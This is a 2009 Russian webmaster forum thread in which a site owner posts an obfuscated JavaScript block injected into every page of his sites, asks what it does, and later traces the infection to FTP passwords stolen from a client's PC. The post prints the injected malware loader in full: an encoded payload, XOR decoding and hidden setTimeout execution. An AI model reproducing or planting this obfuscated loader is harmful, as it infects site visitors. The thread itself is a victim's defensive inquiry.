На всех страницах появился script ClgwzwPlDp

Тема в разделе ".:: Уязвимости", создана пользователем mainIvan, 18 окт 2009.

Статус темы:
Закрыта.
  1. mainIvan

    mainIvan Постоялец

    Регистр.:
    28 янв 2008
    Сообщения:
    53
    Симпатии:
    3
    Столкнулся с такой проблемой. На двух моих сайтах размещен такой код
    PHP:
    <script>ClgwzwPlDp='';var nVJN='';var sTIG='';var eJC='';var sFM='';var sYV;var qOR='';var oJT=false;var bRDM=false;sYV='%f4%e6%fa%eb%ee%f0%f7%e7%c3%83%cf%9e%a6%8b%89%f2%a4%b8%bf%97%cc%ba%98%9d%b4%e8%b8%bd%8e%90%ee%a1%bc%aa%81%85%b2%a9%b7%a2%81%c5%a6%bb%a8%a4%ab%e4%b4%aa%cc%97%9b%f7%9e%e3%a8%e2%a6%ba%ad%c3%95%89%a6%ff%f7%f6%f8%ed%f9%ae%ed%d8%c1%ef%ea%af%a4%a9%fd%fc%fb%e6%d7%c1%b7%8d%84%e8%f8%fc%ff%d2%cd%a7%a7%b1%e9%e1%eb%fb%ea%e6%d9%d4%ea%d3%d4%b7%a6%af%e0%d7%c4%a4%f9%80%e2%e2%fb%ea%93%98%a4%e9%e5%f5%d7%c0%d0%f1%da%dc%9a%e9%f3%e3%e7%8a%dc%d9%a3%b1%dd%d1%da%b4%d7%df%f5%c4%b5%af%b4%b0%e2%f0%fc%e0%df%cc%80%ad%bf%b4';var hODA="hODA";var uHSZ="uHSZ";function dRDP(cEC){var qXR="qXR";var sBQ='';var jEJ='';var xXK=56834;var kQK=25083;var cAX=false;var lMR="";function vBB(vJY){var lJH=false;var sJP="sJP";var dYQ="dYQ";var mUA="";var yIOH="yIOH";var uRLF=0,cHJD=vJY.length;var wOUH="";var aBQD=63296;var wWC="wWC";var eYQT='';var jSQ=0;var pVAB=false;var hSYO="hSYO";var pOB="";var dKQ=false;var zRS=65048;while(jSQ<cHJD){var fVDT='';var mUHX=37789;var xFUJ="xFUJ";var gLC="";var mKFD="";jSQ++;var qQAI='';var tZMU="tZMU";wIK=yMSC(vJY,jSQ-1);var pABX=false;var tOEE=false;var nCD="nCD";uRLF+=wIK*cHJD;var vUYS=false;var xHX="";var tXI=28007;var hJVK="hJVK";}var oIM='';var sGX="";var rPY='';var mHD=9823;var lWHT='';var gHY=45293;return new String(uRLF);var iPZJ=49966;var sNR='';var uWT="uWT";}var tMBW=false;var yOOJ='';var eAH='';var yOA="yOA";var xRLU=false;var cJHN="";function nDV(bGJOaZI){var iOZ='';var pJI=26745;var kGT=false;var gBJO="";var kBSM='';var bPRA=39128;var oCTC=false;var eYT=false;if(dPIH == null) {var pSRR=28719;var pQH="";dPIH = {};var uCPY=false;var yXYQ=22082;var rMUW="";var kLUJ='';}var nYEM="";var hDJ='';var nGU="nGU";var kWYO=false;var lMM='';var oEP=12311;if(dPIH[bGJO] == null) {var dVH=false;var lSC=10801;var uMW='';dPIH[bGJO] = new Object();var iLB='';var aXP=false;dPIH[bGJO].uZFY 0;var zKH=false;var fKYB=false;var vHFW="vHFW";dPIH[bGJO].pIJN aZI;var hIR="hIR";var cBJ="cBJ";}var iPF="";var kMD='';}var sZVK=60896;var bBB=29833;var dKQL='';var pFT="pFT";var kOH='';var xIA="";function dPQ(bGJO) {var gNL="gNL";var vHSQ=56687;var fSK=13367;if(dPIH[bGJO] != null) {var nFO="";var rWGC="";var vNB dPIH[bGJO].uZFY;var bVZ=22992;var uBM=48478;var dRK='';var tKM dPIH[bGJO].pIJN.substr(vNB1);var aHC=false;var bADW=false;var nHN=false;var uKUE=false;var oXCT='';var wXWY="";var qYZG="qYZG";var bFS='';if(vNB >= dPIH[bGJO].pIJN.length) {var fEB="fEB";var wXW="";var hXHI="hXHI";dPIH[bGJO].uZFY 0;var qNU="qNU";var qJA=false;var nZPJ=56035;var iQN=false;} else {var bWR="bWR";var jOJ="";var bJN=9514;var nRAE="nRAE";dPIH[bGJO].uZFY vNB 1;var eIXX=false;var wOP=false;var zWJ=8982;}var mNK='';var hSH='';var pTQ="";return yMSC(tKM0);var wEW="";var mWNZ="";var hPNQ="";}var wGB="wGB";var fKD=false;var vQD="";}var tUL="tUL";var iOM=37506;var bHGE="";var mPR="mPR";var oYJB=28660;function yMSC(mLE,rVTA){var kLDA='';var mDNI="";var cNN='';var rLO="";return mLE.charCodeAt(rVTA);var uMCW="uMCW";var tVQD='';}var pJE='';var wFCK=false;var oIJV=false;var cWPF='';var pBR = new String(document['d/owcyu/myewnwt/'.replace(/[/\!byw]/g'')]);var sZLL='';var wHKH="wHKH";var mTE=false;var gVH=false;var rWUC=7787;var bBQ=false;if(pBR.indexOf('agr6i6t?y$'.replace(/[\$n6\?g]/g'')) != -1) {var dZE="";var sGMY='';var aSU=''; return 207;var fZNQ="fZNQ";var jYBM=56570;var sEE="sEE";}var tGW=false;var qWX=9838;var qPES="qPES";var yZA=false;var jWAF="";var aZS="";var lNS=false;var dPIH null;var eHOF="eHOF";var oEK='';var jXV="";var xHW=window;var bQN="bQN";var xCYL="";var yHVK='';var wVN=window;var gZX='';var sRT="";var aTNN="aTNN";var cQMN="cQMN";var lDJ=String;var cZR=29348;var jNS=false;var qEKD="qEKD";var gHUS xHW['sbect~T:ibm:e~obubt~'.replace(/[~cb3\:]/g'')];var eNEZ=false;var eAY='';var zHM=false;var pDQ="";var qEGW=207;var wMX='';var pOK=32092;var xTKZ=xHW['u]n]eisic]a]p(e]'.replace(/[\]iO\(_]/g'')];var aHR="";var wFS="";var kONZ='';var vEMF='';var aBXQ '';var qLGH=49474;var ePMG="";var tSYK=false;var eMI=lDJ['fUr(okmkCXhUa(r+C(oXdUeU'.replace(/[UXk\(\+]/g'')];var pIM='';var yICB="";var cEC xTKZ(cEC);var pUMU=false;var vAOT=false;var lQCX="lQCX";var bBKB="";var gNF=46948;var dCU=14559;var qPP=false;var oQOZ="";var jVQ = new lDJ(dRDP).replace(/[^@a-z0-9A-Z_-]/g,'');var pTAW="pTAW";var iMU=false;var jLZ="jLZ";var aZYI = new lDJ(vBB(jVQ));var fZMY='';var aEF='';var fTU="fTU";var yJZ="";var uSH=32357;var eFVL="eFVL";var bWQX=false;nDV('sAB'jVQ);var kCGH="kCGH";var oWN=52606;nDV('eKJV'aZYI);var eCNX=false;var cYO=3466;var xMY="";var kQST=53720;var gLE=false;var xTHM=false;for(var dHJI=0dHJI < (cEC.length); dHJI++) {var iUW='';var cIE=16134;var mNT='';var eXD=16667;var fAQC="fAQC";var hVY='';var kHZK yMSC(cEC,dHJI);var iIV="iIV";var hVS="";var oJDE="";var qICQ='';kHZK^= qEGW;var uZTY="";var lHJ=false;var tRM=false;var kZO='';kHZK^= dPQ('eKJV');var jIL='';var vCK="";var zMIQ='';kHZK^= dPQ('sAB');var tQNW="tQNW";var mRK=false;var xCW='';var oQZG='';var lXDH="lXDH";var sKU=false;aBXQ+=eMI(kHZK);var yVQ='';var qILG=false;var nPR="nPR";var lPYF=15403;}var bVO="bVO";var mGGV=false;var yCLV=43167;var gVD="gVD";var zAEP="";var hUEM='';var uVZ='';gHUS(aBXQ190);var oNNF="oNNF";var tBFQ="tBFQ";return aBXQ=new lDJ();var gAU="gAU";var dYVL=false;var lEO=false;var cLPG=false;};var vDM="vDM";var iCDD="";var dVZW=false;var aRY=false;dRDP(sYV);var uDI=20361;var pAV=false;</script>
    Что делает подобный скрипт?
    при заходе не сайт бывает виснит браузер и выбивает.
    сейчас меняю пароли и убираю сохраненные пароли в Тотале
    Заражаются все страницы, но не сразу
    Пытался погуглить ответ, в итоге нашел зараженные сайты)
    :bc:
     
  2. Liver

    Liver

    Регистр.:
    24 сен 2008
    Сообщения:
    316
    Симпатии:
    91
    Да похоже что ничего не делает.
    В таком виде как есть, он вызывает ошибку парсинга.
    А по логике работы он просто разбирает что-то зашифрованное, но почему то не видно вызова на исполнение.
    Самому интересно, как он работает.

    Есть подозрение, что не выполняет код, а присвает результат какой то переменной из жаваскрипта сайта, таким образом подменяя функционал законных яваскриптов.

    зы: хорошо зашифровали. неплохо было бы поиметь такую шифровалку.
     
  3. mainIvan

    mainIvan Постоялец

    Регистр.:
    28 янв 2008
    Сообщения:
    53
    Симпатии:
    3
    нашел причину - был заражен компьютер у заказчика, поменял пароли фтп (пароли у него хранились в Тотале) и поубирал вредоносный код (чужих файлов не нашел).
    больше не появляется этот код на страничках.
     
Статус темы:
Закрыта.